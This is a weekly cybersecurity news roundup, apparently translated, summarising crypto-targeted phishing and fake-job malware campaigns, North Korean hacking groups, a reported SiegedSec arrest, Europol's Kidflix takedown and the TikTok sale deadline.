Seed-Phrase Poison, a Contagious "Coinbase Job Opening" and Other Cybersecurity Developments

We've compiled the most important news from the world of cybersecurity for the week.

Seed-Phrase Poison, a Contagious "Coinbase Job Opening" and Other Cybersecurity Developments
Seed-Phrase Poison, a Contagious "Coinbase Job Opening" and Other Cybersecurity Developments

Coinbase and Ledger customers were the target of a phishing email of seed-phrases

SilentPush analysts detected a PoisonSeed phishing campaign sending out emails with seed-phrases to steal cryptocurrencies. 

In the first stage, the attackers create fake pages of well-known mass-mailing platforms, including Mailchimp, SendGrid, HubSpot, Mailgun and Zoho. They use them to hack into the corporate email accounts of various marketers and send spam from them. The hackers focus on Coinbase exchange customers and Ledger hardware wallet owners.

The mailing is usually an urgent notification, in the style of "Coinbase is switching to self-storage wallets" and contains a seed phrase. The latter is suggested to be entered when creating a new cryptocurrency wallet ostensibly for "secure asset transfer" as part of an upgrade or migration.

Fake email on behalf of Coinbase. Source: SilentPush.
Fake email on behalf of Coinbase. Source: SilentPush.

If the victim follows this instruction, the attacker gains full control over their funds.

DPRK hackers pretended to be HR managers of major cryptocurrency exchanges

Sekoia experts pointed to a new ClickFix tactic that North Korean hacker group Lazarus Group has begun using to attack job applicants in the AI and cryptocurrency industries.

Professionals receive invitations from fake interview sites. Users encounter errors when navigating to them and viewing the content. The page offers to "fix" the problem by running PowerShell commands that download malware.

In this campaign, hackers impersonate well-known crypto projects including Coinbase, KuCoin, Kraken, Circle, Securitize, BlockFi, Tether, Robinhood and Bybit.

Brands used by hackers. Source: Sekoia.
Brands used by hackers. Source: Sekoia.

In addition to stealing cryptocurrencies, the malware is capable of performing file operations, shell commands, stealing cookies, browsing history and stored passwords, and collecting system metadata.

Members of the group that hacked the NATO portal have suggested the arrest of their leader

A member of SiegedSec, the hacker group responsible for hacking the NATO portal, The Heritage Foundation think tank and a nuclear lab in Idaho, has suggested that the FBI raided their leader's home under the nickname vio and arrested her. This was reported by the Daily Dot, citing a March 26 tweet.

A day later, a new post noted that "the silence surrounding the SiegedSec case is troubling."

Details on the situation are few. SiegedSec dissolved in July 2024 after a warning from executives at The Heritage Foundation that information about the hackers had been turned over to the FBI. However, the bureau has not publicly announced an investigation or any charges.

Europol shut down KidFlix platform with child abuse content

German law enforcers, together with colleagues from the Netherlands, stopped the operation of Kidflix, one of the largest darknet platforms for the distribution of CSAM material. The operation began in 2022 and ended on March 11, 2025, but details have only now been revealed.

During the operation, 79 people were arrested, 1,393 suspects were identified, and more than 3,000 electronic devices were seized. The site's server was also confiscated.

Source: Europol.
Source: Europol.

Since its launch in 2021, Kidflix has posted more than 91,000 unique videos totaling 6,288 hours. The number of users exceeded 1.8 million people. They paid for viewing content in cryptocurrencies and could earn internal tokens for activity.

The case file has been handed over to investigative authorities in 35 countries for further work with the suspects.

Paradigm has broken down the cases of North Korea's top cryptohackers

Paradigm has prepared a detailed report on North Korean cybercrime groups behind attacks on organizations and individuals around the world. 

In addition to the most well-known Lazarus group, experts described Contagious Interview and Wagemole running a scheme to hire IT employees. Hackers steal a wide range of data, including cryptocurrencies.

AppleJeus spreads malware disguised as trading apps and crypto utilities, while Dangerous Password uses social engineering to attack digital asset holders;

The TraderTraitor group, which targets bitcoin exchanges and large core companies by hacking them with high-tech targeted phishing techniques, has been named the most sophisticated by analysts.

The U.S. blocking of TikTok has been postponed

On April 4, US President Donald Trump extended by 75 days the deadline given to ByteDance, the company that owns the TikTok service, to sell US assets to avoid being blocked. The head of state expressed hope for continued "good faith cooperation with China."

Reuters citing sources said the deal was put on hold by the Chinese side after imposing 54 percent duty on imports of their goods into the United States.